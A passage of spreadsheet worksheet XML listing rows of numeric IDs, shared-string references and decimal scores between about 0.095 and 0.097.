      <c r="F27545" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27546" ht="15.75" customHeight="1">
      <c r="A27546" s="1">
        <v>7789.0</v>
      </c>
      <c r="B27546" s="2">
        <v>5.2201038E7</v>
      </c>
      <c r="C27546" s="2" t="s">
        <v>26476</v>
      </c>
      <c r="D27546" s="2">
        <v>1.0</v>
      </c>
      <c r="E27546" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27546" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27547" ht="15.75" customHeight="1">
      <c r="A27547" s="1">
        <v>9094.0</v>
      </c>
      <c r="B27547" s="2">
        <v>5.5144452E7</v>
      </c>
      <c r="C27547" s="2" t="s">
        <v>26477</v>
      </c>
      <c r="D27547" s="2">
        <v>1.0</v>
      </c>
      <c r="E27547" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27547" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27548" ht="15.75" customHeight="1">
      <c r="A27548" s="1">
        <v>11164.0</v>
      </c>
      <c r="B27548" s="2">
        <v>1.955292E7</v>
      </c>
      <c r="C27548" s="2" t="s">
        <v>26478</v>
      </c>
      <c r="D27548" s="2">
        <v>1.0</v>
      </c>
      <c r="E27548" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27548" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27549" ht="15.75" customHeight="1">
      <c r="A27549" s="1">
        <v>13313.0</v>
      </c>
      <c r="B27549" s="2">
        <v>3.4551909E7</v>
      </c>
      <c r="C27549" s="2" t="s">
        <v>26479</v>
      </c>
      <c r="D27549" s="2">
        <v>1.0</v>
      </c>
      <c r="E27549" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27549" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27550" ht="15.75" customHeight="1">
      <c r="A27550" s="1">
        <v>14790.0</v>
      </c>
      <c r="B27550" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C27550" s="2" t="s">
        <v>26480</v>
      </c>
      <c r="D27550" s="2">
        <v>1.0</v>
      </c>
      <c r="E27550" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27550" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27551" ht="15.75" customHeight="1">
      <c r="A27551" s="1">
        <v>16054.0</v>
      </c>
      <c r="B27551" s="2">
        <v>4524111.0</v>
      </c>
      <c r="C27551" s="2" t="s">
        <v>26481</v>
      </c>
      <c r="D27551" s="2">
        <v>1.0</v>
      </c>
      <c r="E27551" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27551" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27552" ht="15.75" customHeight="1">
      <c r="A27552" s="1">
        <v>17736.0</v>
      </c>
      <c r="B27552" s="2">
        <v>5.0672959E7</v>
      </c>
      <c r="C27552" s="2" t="s">
        <v>26482</v>
      </c>
      <c r="D27552" s="2">
        <v>1.0</v>
      </c>
      <c r="E27552" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27552" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27553" ht="15.75" customHeight="1">
      <c r="A27553" s="1">
        <v>19004.0</v>
      </c>
      <c r="B27553" s="2">
        <v>5.4476508E7</v>
      </c>
      <c r="C27553" s="2" t="s">
        <v>26483</v>
      </c>
      <c r="D27553" s="2">
        <v>1.0</v>
      </c>
      <c r="E27553" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27553" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27554" ht="15.75" customHeight="1">
      <c r="A27554" s="1">
        <v>19573.0</v>
      </c>
      <c r="B27554" s="2">
        <v>5.6136064E7</v>
      </c>
      <c r="C27554" s="2" t="s">
        <v>26484</v>
      </c>
      <c r="D27554" s="2">
        <v>1.0</v>
      </c>
      <c r="E27554" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27554" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27555" ht="15.75" customHeight="1">
      <c r="A27555" s="1">
        <v>20539.0</v>
      </c>
      <c r="B27555" s="2">
        <v>1.3309819E7</v>
      </c>
      <c r="C27555" s="2" t="s">
        <v>26485</v>
      </c>
      <c r="D27555" s="2">
        <v>1.0</v>
      </c>
      <c r="E27555" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27555" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27556" ht="15.75" customHeight="1">
      <c r="A27556" s="1">
        <v>21873.0</v>
      </c>
      <c r="B27556" s="2">
        <v>2.755705E7</v>
      </c>
      <c r="C27556" s="2" t="s">
        <v>26463</v>
      </c>
      <c r="D27556" s="2">
        <v>1.0</v>
      </c>
      <c r="E27556" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27556" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27557" ht="15.75" customHeight="1">
      <c r="A27557" s="1">
        <v>23472.0</v>
      </c>
      <c r="B27557" s="2">
        <v>5.7202922E7</v>
      </c>
      <c r="C27557" s="2" t="s">
        <v>26486</v>
      </c>
      <c r="D27557" s="2">
        <v>1.0</v>
      </c>
      <c r="E27557" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27557" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27558" ht="15.75" customHeight="1">
      <c r="A27558" s="1">
        <v>27429.0</v>
      </c>
      <c r="B27558" s="2">
        <v>2.1909581E7</v>
      </c>
      <c r="C27558" s="2" t="s">
        <v>26487</v>
      </c>
      <c r="D27558" s="2">
        <v>1.0</v>
      </c>
      <c r="E27558" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27558" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27559" ht="15.75" customHeight="1">
      <c r="A27559" s="1">
        <v>28774.0</v>
      </c>
      <c r="B27559" s="2">
        <v>2.8429652E7</v>
      </c>
      <c r="C27559" s="2" t="s">
        <v>26488</v>
      </c>
      <c r="D27559" s="2">
        <v>1.0</v>
      </c>
      <c r="E27559" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27559" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27560" ht="15.75" customHeight="1">
      <c r="A27560" s="1">
        <v>1391.0</v>
      </c>
      <c r="B27560" s="2">
        <v>2.6268039E7</v>
      </c>
      <c r="C27560" s="2" t="s">
        <v>26489</v>
      </c>
      <c r="D27560" s="2">
        <v>1.0</v>
      </c>
      <c r="E27560" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27560" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="27561" ht="15.75" customHeight="1">
      <c r="A27561" s="1">
        <v>1513.0</v>
      </c>
      <c r="B27561" s="2">
        <v>2.7321281E7</v>
      </c>
      <c r="C27561" s="2" t="s">
        <v>26490</v>
      </c>
      <c r="D27561" s="2">
        <v>1.0</v>
      </c>
      <c r="E27561" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27561" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="27562" ht="15.75" customHeight="1">
      <c r="A27562" s="1">
        <v>4782.0</v>
      </c>
      <c r="B27562" s="2">
        <v>4.3443665E7</v>
      </c>
      <c r="C27562" s="2" t="s">
        <v>26491</v>
      </c>
      <c r="D27562" s="2">
        <v>1.0</v>
      </c>
      <c r="E27562" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27562" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="27563" ht="15.75" customHeight="1">
      <c r="A27563" s="1">
        <v>8262.0</v>
      </c>
      <c r="B27563" s="2">
        <v>5.3423858E7</v>
      </c>
      <c r="C27563" s="2" t="s">
        <v>26492</v>
      </c>
      <c r="D27563" s="2">
        <v>1.0</v>
      </c>
      <c r="E27563" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27563" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="27564" ht="15.75" customHeight="1">
      <c r="A27564" s="1">
        <v>11992.0</v>
      </c>
      <c r="B27564" s="2">
        <v>2.5870911E7</v>
      </c>
      <c r="C27564" s="2" t="s">
        <v>26493</v>
      </c>
      <c r="D27564" s="2">
        <v>1.0</v>
      </c>
      <c r="E27564" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27564" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="27565" ht="15.75" customHeight="1">
      <c r="A27565" s="1">
        <v>13977.0</v>
      </c>
      <c r="B27565" s="2">
        <v>3.7344915E7</v>
      </c>
      <c r="C27565" s="2" t="s">
        <v>26365</v>
      </c>
      <c r="D27565" s="2">
        <v>1.0</v>
      </c>
      <c r="E27565" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27565" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="27566" ht="15.75" customHeight="1">
      <c r="A27566" s="1">
        <v>14323.0</v>
      </c>
      <c r="B27566" s="2">
        <v>3.8708979E7</v>
      </c>
      <c r="C27566" s="2" t="s">
        <v>26494</v>
      </c>
      <c r="D27566" s="2">
        <v>1.0</v>
      </c>
      <c r="E27566" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27566" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="27567" ht="15.75" customHeight="1">
      <c r="A27567" s="1">
        <v>15266.0</v>
      </c>
      <c r="B27567" s="2">
        <v>4.2331834E7</v>
      </c>
      <c r="C27567" s="2" t="s">
        <v>26495</v>
      </c>
      <c r="D27567" s="2">
        <v>1.0</v>
      </c>
      <c r="E27567" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27567" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="27568" ht="15.75" customHeight="1">
      <c r="A27568" s="1">
        <v>23044.0</v>
      </c>
      <c r="B27568" s="2">
        <v>5.0171707E7</v>
      </c>
      <c r="C27568" s="2" t="s">
        <v>26496</v>
      </c>
      <c r="D27568" s="2">
        <v>1.0</v>
      </c>
      <c r="E27568" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27568" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="27569" ht="15.75" customHeight="1">
      <c r="A27569" s="1">
        <v>31435.0</v>
      </c>
      <c r="B27569" s="2">
        <v>5.0171706E7</v>
      </c>
      <c r="C27569" s="2" t="s">
        <v>26496</v>
      </c>
      <c r="D27569" s="2">
        <v>1.0</v>
      </c>
      <c r="E27569" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27569" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="27570" ht="15.75" customHeight="1">
      <c r="A27570" s="1">
        <v>2464.0</v>
      </c>
      <c r="B27570" s="2">
        <v>3.3792407E7</v>
      </c>
      <c r="C27570" s="2" t="s">
        <v>26497</v>
      </c>
      <c r="D27570" s="2">
        <v>1.0</v>
      </c>
      <c r="E27570" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27570" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="27571" ht="15.75" customHeight="1">
      <c r="A27571" s="1">
        <v>1926.0</v>
      </c>
      <c r="B27571" s="2">
        <v>3.0100683E7</v>
      </c>
      <c r="C27571" s="2" t="s">
        <v>26498</v>
      </c>
      <c r="D27571" s="2">
        <v>1.0</v>
      </c>
      <c r="E27571" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27571" s="2">
        <v>0.09694989106753814</v>
      </c>
    </row>
    <row r="27572" ht="15.75" customHeight="1">
      <c r="A27572" s="1">
        <v>5041.0</v>
      </c>
      <c r="B27572" s="2">
        <v>4.4298908E7</v>
      </c>
      <c r="C27572" s="2" t="s">
        <v>26499</v>
      </c>
      <c r="D27572" s="2">
        <v>1.0</v>
      </c>
      <c r="E27572" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27572" s="2">
        <v>0.09694989106753814</v>
      </c>
    </row>
    <row r="27573" ht="15.75" customHeight="1">
      <c r="A27573" s="1">
        <v>14350.0</v>
      </c>
      <c r="B27573" s="2">
        <v>3.888701E7</v>
      </c>
      <c r="C27573" s="2" t="s">
        <v>26500</v>
      </c>
      <c r="D27573" s="2">
        <v>1.0</v>
      </c>
      <c r="E27573" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27573" s="2">
        <v>0.09694989106753814</v>
      </c>
    </row>
    <row r="27574" ht="15.75" customHeight="1">
      <c r="A27574" s="1">
        <v>644.0</v>
      </c>
      <c r="B27574" s="2">
        <v>1.9872583E7</v>
      </c>
      <c r="C27574" s="2" t="s">
        <v>26501</v>
      </c>
      <c r="D27574" s="2">
        <v>1.0</v>
      </c>
      <c r="E27574" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27574" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="27575" ht="15.75" customHeight="1">
      <c r="A27575" s="1">
        <v>5730.0</v>
      </c>
      <c r="B27575" s="2">
        <v>4.660963E7</v>
      </c>
      <c r="C27575" s="2" t="s">
        <v>26502</v>
      </c>
      <c r="D27575" s="2">
        <v>1.0</v>
      </c>
      <c r="E27575" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27575" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="27576" ht="15.75" customHeight="1">
      <c r="A27576" s="1">
        <v>6382.0</v>
      </c>
      <c r="B27576" s="2">
        <v>4.8415275E7</v>
      </c>
      <c r="C27576" s="2" t="s">
        <v>26503</v>
      </c>
      <c r="D27576" s="2">
        <v>1.0</v>
      </c>
      <c r="E27576" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27576" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="27577" ht="15.75" customHeight="1">
      <c r="A27577" s="1">
        <v>6895.0</v>
      </c>
      <c r="B27577" s="2">
        <v>4.978997E7</v>
      </c>
      <c r="C27577" s="2" t="s">
        <v>26504</v>
      </c>
      <c r="D27577" s="2">
        <v>1.0</v>
      </c>
      <c r="E27577" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27577" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="27578" ht="15.75" customHeight="1">
      <c r="A27578" s="1">
        <v>9607.0</v>
      </c>
      <c r="B27578" s="2">
        <v>5.6164417E7</v>
      </c>
      <c r="C27578" s="2" t="s">
        <v>26505</v>
      </c>
      <c r="D27578" s="2">
        <v>1.0</v>
      </c>
      <c r="E27578" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27578" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="27579" ht="15.75" customHeight="1">
      <c r="A27579" s="1">
        <v>14069.0</v>
      </c>
      <c r="B27579" s="2">
        <v>3.7603038E7</v>
      </c>
      <c r="C27579" s="2" t="s">
        <v>26506</v>
      </c>
      <c r="D27579" s="2">
        <v>1.0</v>
      </c>
      <c r="E27579" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27579" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="27580" ht="15.75" customHeight="1">
      <c r="A27580" s="1">
        <v>16177.0</v>
      </c>
      <c r="B27580" s="2">
        <v>4.5653148E7</v>
      </c>
      <c r="C27580" s="2" t="s">
        <v>26507</v>
      </c>
      <c r="D27580" s="2">
        <v>1.0</v>
      </c>
      <c r="E27580" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27580" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="27581" ht="15.75" customHeight="1">
      <c r="A27581" s="1">
        <v>16919.0</v>
      </c>
      <c r="B27581" s="2">
        <v>4.8137942E7</v>
      </c>
      <c r="C27581" s="2" t="s">
        <v>26508</v>
      </c>
      <c r="D27581" s="2">
        <v>1.0</v>
      </c>
      <c r="E27581" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27581" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="27582" ht="15.75" customHeight="1">
      <c r="A27582" s="1">
        <v>18411.0</v>
      </c>
      <c r="B27582" s="2">
        <v>5.2678579E7</v>
      </c>
      <c r="C27582" s="2" t="s">
        <v>26509</v>
      </c>
      <c r="D27582" s="2">
        <v>1.0</v>
      </c>
      <c r="E27582" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27582" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="27583" ht="15.75" customHeight="1">
      <c r="A27583" s="1">
        <v>20358.0</v>
      </c>
      <c r="B27583" s="2">
        <v>1.1686867E7</v>
      </c>
      <c r="C27583" s="2" t="s">
        <v>26510</v>
      </c>
      <c r="D27583" s="2">
        <v>1.0</v>
      </c>
      <c r="E27583" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27583" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="27584" ht="15.75" customHeight="1">
      <c r="A27584" s="1">
        <v>26275.0</v>
      </c>
      <c r="B27584" s="2">
        <v>1.6405504E7</v>
      </c>
      <c r="C27584" s="2" t="s">
        <v>26511</v>
      </c>
      <c r="D27584" s="2">
        <v>1.0</v>
      </c>
      <c r="E27584" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27584" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="27585" ht="15.75" customHeight="1">
      <c r="A27585" s="1">
        <v>32786.0</v>
      </c>
      <c r="B27585" s="2">
        <v>6138368.0</v>
      </c>
      <c r="C27585" s="2" t="s">
        <v>26512</v>
      </c>
      <c r="D27585" s="2">
        <v>1.0</v>
      </c>
      <c r="E27585" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27585" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="27586" ht="15.75" customHeight="1">
      <c r="A27586" s="1">
        <v>15217.0</v>
      </c>
      <c r="B27586" s="2">
        <v>4.2145884E7</v>
      </c>
      <c r="C27586" s="2" t="s">
        <v>26513</v>
      </c>
      <c r="D27586" s="2">
        <v>1.0</v>
      </c>
      <c r="E27586" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27586" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="27587" ht="15.75" customHeight="1">
      <c r="A27587" s="1">
        <v>18254.0</v>
      </c>
      <c r="B27587" s="2">
        <v>5.216721E7</v>
      </c>
      <c r="C27587" s="2" t="s">
        <v>26514</v>
      </c>
      <c r="D27587" s="2">
        <v>1.0</v>
      </c>
      <c r="E27587" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27587" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="27588" ht="15.75" customHeight="1">
      <c r="A27588" s="1">
        <v>34254.0</v>
      </c>
      <c r="B27588" s="2">
        <v>4.9250457E7</v>
      </c>
      <c r="C27588" s="2" t="s">
        <v>26515</v>
      </c>
      <c r="D27588" s="2">
        <v>1.0</v>
      </c>
      <c r="E27588" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27588" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="27589" ht="15.75" customHeight="1">
      <c r="A27589" s="1">
        <v>18916.0</v>
      </c>
      <c r="B27589" s="2">
        <v>5.4205555E7</v>
      </c>
      <c r="C27589" s="2" t="s">
        <v>26516</v>
      </c>
      <c r="D27589" s="2">
        <v>1.0</v>
      </c>
      <c r="E27589" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27589" s="2">
        <v>0.09623015873015871</v>
      </c>
    </row>
    <row r="27590" ht="15.75" customHeight="1">
      <c r="A27590" s="1">
        <v>11632.0</v>
      </c>
      <c r="B27590" s="2">
        <v>2.3169411E7</v>
      </c>
      <c r="C27590" s="2" t="s">
        <v>26517</v>
      </c>
      <c r="D27590" s="2">
        <v>1.0</v>
      </c>
      <c r="E27590" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27590" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="27591" ht="15.75" customHeight="1">
      <c r="A27591" s="1">
        <v>17244.0</v>
      </c>
      <c r="B27591" s="2">
        <v>4.9078767E7</v>
      </c>
      <c r="C27591" s="2" t="s">
        <v>26518</v>
      </c>
      <c r="D27591" s="2">
        <v>1.0</v>
      </c>
      <c r="E27591" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27591" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="27592" ht="15.75" customHeight="1">
      <c r="A27592" s="1">
        <v>19741.0</v>
      </c>
      <c r="B27592" s="2">
        <v>5.6691101E7</v>
      </c>
      <c r="C27592" s="2" t="s">
        <v>26519</v>
      </c>
      <c r="D27592" s="2">
        <v>1.0</v>
      </c>
      <c r="E27592" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27592" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="27593" ht="15.75" customHeight="1">
      <c r="A27593" s="1">
        <v>31983.0</v>
      </c>
      <c r="B27593" s="2">
        <v>5.324012E7</v>
      </c>
      <c r="C27593" s="2" t="s">
        <v>26520</v>
      </c>
      <c r="D27593" s="2">
        <v>1.0</v>
      </c>
      <c r="E27593" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27593" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="27594" ht="15.75" customHeight="1">
      <c r="A27594" s="1">
        <v>1507.0</v>
      </c>
      <c r="B27594" s="2">
        <v>2.7302109E7</v>
      </c>
      <c r="C27594" s="2" t="s">
        <v>26521</v>
      </c>
      <c r="D27594" s="2">
        <v>1.0</v>
      </c>
      <c r="E27594" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27594" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="27595" ht="15.75" customHeight="1">
      <c r="A27595" s="1">
        <v>4974.0</v>
      </c>
      <c r="B27595" s="2">
        <v>4.4102811E7</v>
      </c>
      <c r="C27595" s="2" t="s">
        <v>26522</v>
      </c>
      <c r="D27595" s="2">
        <v>1.0</v>
      </c>
      <c r="E27595" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27595" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="27596" ht="15.75" customHeight="1">
      <c r="A27596" s="1">
        <v>21702.0</v>
      </c>
      <c r="B27596" s="2">
        <v>2.5256133E7</v>
      </c>
      <c r="C27596" s="2" t="s">
        <v>26523</v>
      </c>
      <c r="D27596" s="2">
        <v>1.0</v>
      </c>
      <c r="E27596" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27596" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="27597" ht="15.75" customHeight="1">
      <c r="A27597" s="1">
        <v>30472.0</v>
      </c>
      <c r="B27597" s="2">
        <v>3.9557359E7</v>
      </c>
      <c r="C27597" s="2" t="s">
        <v>26524</v>
      </c>
      <c r="D27597" s="2">
        <v>1.0</v>
      </c>
      <c r="E27597" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27597" s="2">
        <v>0.09595959595959593</v>
      </c>
    </row>
    <row r="27598" ht="15.75" customHeight="1">
      <c r="A27598" s="1">
        <v>28805.0</v>
      </c>
      <c r="B27598" s="2">
        <v>2.8660022E7</v>
      </c>
      <c r="C27598" s="2" t="s">
        <v>26525</v>
      </c>
      <c r="D27598" s="2">
        <v>1.0</v>
      </c>
      <c r="E27598" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27598" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="27599" ht="15.75" customHeight="1">
      <c r="A27599" s="1">
        <v>19002.0</v>
      </c>
      <c r="B27599" s="2">
        <v>5.4464888E7</v>
      </c>
      <c r="C27599" s="2" t="s">
        <v>26526</v>
      </c>
      <c r="D27599" s="2">
        <v>1.0</v>
      </c>
      <c r="E27599" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27599" s="2">
        <v>0.09538784067085955</v>
      </c>
    </row>
    <row r="27600" ht="15.75" customHeight="1">
      <c r="A27600" s="1">
        <v>31999.0</v>
      </c>
      <c r="B27600" s="2">
        <v>5336505.0</v>
      </c>
      <c r="C27600" s="2" t="s">
        <v>26527</v>
      </c>
      <c r="D27600" s="2">
        <v>1.0</v>
      </c>
      <c r="E27600" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27600" s="2">
        <v>0.09538784067085955</v>
      </c>
    </row>
    <row r="27601" ht="15.75" customHeight="1">
      <c r="A27601" s="1">
        <v>11791.0</v>
      </c>
      <c r="B27601" s="2">
        <v>2.4363325E7</v>
      </c>
      <c r="C27601" s="2" t="s">
        <v>26528</v>
      </c>
      <c r="D27601" s="2">
        <v>1.0</v>
      </c>
      <c r="E27601" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27601" s="2">
        <v>0.09508547008547007</v>
      </c>
    </row>
    <row r="27602" ht="15.75" customHeight="1">
      <c r="A27602" s="1">
        <v>23069.0</v>
      </c>
      <c r="B27602" s="2">
        <v>5.0476235E7</v>
      </c>
      <c r="C27602" s="2" t="s">
        <v>26529</v>
      </c>
      <c r="D27602" s="2">
        <v>1.0</v>
      </c>
      <c r="E27602" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27602" s="2">
        <v>0.09477124183006537</v>
      </c>
    </row>
    <row r="27603" ht="15.75" customHeight="1">
      <c r="A27603" s="1">
        <v>29891.0</v>
      </c>
      <c r="B27603" s="2">
        <v>3607013.0</v>
      </c>
      <c r="C27603" s="2" t="s">
        <v>26530</v>
      </c>
      <c r="D27603" s="2">
        <v>1.0</v>
      </c>
      <c r="E27603" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27603" s="2">
        <v>0.09477124183006537</v>
      </c>
    </row>
    <row r="27604" ht="15.75" customHeight="1">
      <c r="A27604" s="1">
        <v>1062.0</v>
      </c>
      <c r="B27604" s="2">
        <v>2.3513025E7</v>
      </c>
      <c r="C27604" s="2" t="s">
        <v>26531</v>
      </c>
      <c r="D27604" s="2">
        <v>1.0</v>
      </c>
      <c r="E27604" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27604" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="27605" ht="15.75" customHeight="1">
      <c r="A27605" s="1">
        <v>1208.0</v>
      </c>
      <c r="B27605" s="2">
        <v>2.4834189E7</v>
      </c>
      <c r="C27605" s="2" t="s">
        <v>26532</v>
      </c>
      <c r="D27605" s="2">
        <v>1.0</v>
      </c>
      <c r="E27605" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27605" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="27606" ht="15.75" customHeight="1">
      <c r="A27606" s="1">
        <v>5916.0</v>
      </c>
      <c r="B27606" s="2">
        <v>4.720593E7</v>
      </c>
      <c r="C27606" s="2" t="s">
        <v>26533</v>
      </c>
      <c r="D27606" s="2">
        <v>1.0</v>
      </c>
      <c r="E27606" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27606" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="27607" ht="15.75" customHeight="1">
      <c r="A27607" s="1">
        <v>6384.0</v>
      </c>
      <c r="B27607" s="2">
        <v>4.8421505E7</v>
      </c>
      <c r="C27607" s="2" t="s">
        <v>26534</v>
      </c>
      <c r="D27607" s="2">
        <v>1.0</v>
      </c>
      <c r="E27607" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27607" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="27608" ht="15.75" customHeight="1">
      <c r="A27608" s="1">
        <v>6950.0</v>
      </c>
      <c r="B27608" s="2">
        <v>4.9960616E7</v>
      </c>
      <c r="C27608" s="2" t="s">
        <v>26535</v>
      </c>
      <c r="D27608" s="2">
        <v>1.0</v>
      </c>
      <c r="E27608" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27608" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="27609" ht="15.75" customHeight="1">
      <c r="A27609" s="1">
        <v>8348.0</v>
      </c>
      <c r="B27609" s="2">
        <v>5.3737955E7</v>
      </c>
      <c r="C27609" s="2" t="s">
        <v>26536</v>
      </c>
      <c r="D27609" s="2">
        <v>1.0</v>
      </c>
      <c r="E27609" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27609" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="27610" ht="15.75" customHeight="1">
      <c r="A27610" s="1">
        <v>8525.0</v>
      </c>
      <c r="B27610" s="2">
        <v>5.4096901E7</v>
      </c>
      <c r="C27610" s="2" t="s">
        <v>26537</v>
      </c>
      <c r="D27610" s="2">
        <v>1.0</v>
      </c>
      <c r="E27610" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27610" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="27611" ht="15.75" customHeight="1">
      <c r="A27611" s="1">
        <v>14192.0</v>
      </c>
      <c r="B27611" s="2">
        <v>3.8179246E7</v>
      </c>
      <c r="C27611" s="2" t="s">
        <v>26538</v>
      </c>
      <c r="D27611" s="2">
        <v>1.0</v>
      </c>
      <c r="E27611" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27611" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="27612" ht="15.75" customHeight="1">
      <c r="A27612" s="1">
        <v>5281.0</v>
      </c>
      <c r="B27612" s="2">
        <v>4.5183872E7</v>
      </c>
      <c r="C27612" s="2" t="s">
        <v>26539</v>
      </c>
      <c r="D27612" s="2">
        <v>1.0</v>
      </c>
      <c r="E27612" s="3" t="s">
        <v>24318</v>
      </c>
